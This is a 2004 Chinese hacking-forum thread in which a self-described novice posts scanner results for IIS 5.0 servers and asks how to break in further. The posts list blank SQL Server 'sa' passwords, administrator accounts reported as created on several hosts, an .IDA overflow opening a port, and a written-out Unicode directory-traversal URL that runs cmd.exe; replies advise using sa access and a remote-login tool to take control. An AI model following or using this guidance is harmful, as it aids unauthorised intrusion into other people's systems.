Board logo

标题: 看我的扫描报告 [打印本页]
作者: c123    时间: 2004-7-16 23:09     标题: 看我的扫描报告

端口扫描

110(POP3)
25(SMTP)
80(HTTP)
443(HTTPS)

--------------------------------------------------------------------------------
IIS扫描

FrontPage: FrontPage 扩展

--------------------------------------------------------------------------------
CGI扫描

WEB版本信息: Microsoft-IIS/5.0
扫描成功CGI漏洞
/_vti_bin/shtml.dll/_vti_rpc (HTTP: 200 )
/scripts/samples/search/author.idq (HTTP: 200 )
/scripts/samples/search/qfullhit.htw (HTTP: 200 )
/scripts/samples/search/filetime.idq (HTTP: 200 )
/scripts/samples/search/queryhit.idq (HTTP: 200 )
/scripts/samples/search/simple.idq (HTTP: 200 )
/scripts/samples/search/query.idq (HTTP: 200 )
/scripts/samples/search/filesize.idq (HTTP: 200 )
/scripts/samples/search/qsumrhit.htw (HTTP: 200 )
/abczxv.htw (HTTP: 200 )
/_vti_inf.html (HTTP: 200 )
/_vti_bin/shtml.dll/_vti_rpc (HTTP: 200 )
/_vti_bin/fpcount.exe (HTTP: 502 )
/blabla.idq (HTTP: 200 )
/_vti_bin/shtml.exe (HTTP: 200 )
/_vti_bin/shtml.dll (HTTP: 200 )
/*.ida (HTTP: 200 )
/?PageServices (HTTP: 200 )
/*.idq (HTTP: 200 )

--------------------------------------------------------------------------------
Plugins

IIS5.0 .Printer Exploit(Grant System Privileges)

接下来我应该做什么 我想给他开3389端口 要用什么工具和怎么做 怎么打命令 说的详细点啊 我是新手
作者: c123    时间: 2004-7-16 23:14     标题: 看我的扫描报告

SQL漏洞:
      sa帐号密码为空。
主机:  SQL漏洞:
      sa帐号密码为空。
主机:  SQL漏洞:
      sa帐号密码为空。
      建立系统管理员帐号(shanlu)成功。
主机:
  SQL漏洞:
      sa帐号密码为空。
主机:
  SQL漏洞:
      sa帐号密码为空。
主机:  SQL漏洞:
      sa帐号密码为空。
      建立系统管理员帐号(shanlu)成功。
主机:
  SQL漏洞:
      sa帐号密码为空。
主机:
  3389,Windows 2000 Advance Server Terminal 端口开放。
  IIS溢出:
      发现:.IDA远程溢出漏洞
      99端口开放成功。
主机:  SQL漏洞:
      sa帐号密码为空。
主机:
  SQL漏洞:
      sa帐号密码为空。
      建立系统管理员帐号(shanlu)成功
主机:  SQL漏洞:
      sa帐号密码为空
主机:  SQL漏洞:
      sa帐号密码为空
主机:  SQL漏洞:
      sa帐号密码为空。
主机:  SQL漏洞:
      sa帐号密码为空。
主机:  SQL漏洞:
      sa帐号密码为空。
      建立系统管理员帐号(shanlu)成功。
主机:  SQL漏洞:
      sa帐号密码为空。
主机:
  SQL漏洞:
      sa帐号密码为空
主机:
  SQL漏洞:
      sa帐号密码为空。
主机:  简单管理员密码:
      帐号:
      技术部()[Administrators][Users]
主机:  SQL漏洞:
      sa帐号密码为空。
      建立系统管理员帐号(shanlu)成功。
主机:  SQL漏洞:
      sa帐号密码为空。
http:///scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 可执行Url
主机:  可执行Url:
      发现:http:///scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
还有这些 都是怎么用啊 我是菜鸟啊 教教我
作者: 激进组织    时间: 2004-7-17 11:54     标题: 看我的扫描报告

得到了SA差不多得到了ADMIN权限,接下来什么都好办
作者: 爱中国    时间: 2004-7-17 12:31     标题: 看我的扫描报告

用“远程登陆器”直接连接看看
作者: c123    时间: 2004-7-17 14:48     标题: 看我的扫描报告

sql 主机:
SQL漏洞:
     sa帐号密码为空
这个怎么用啊 你们给我讲的详细点 是不是还有什么工具啊 



欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2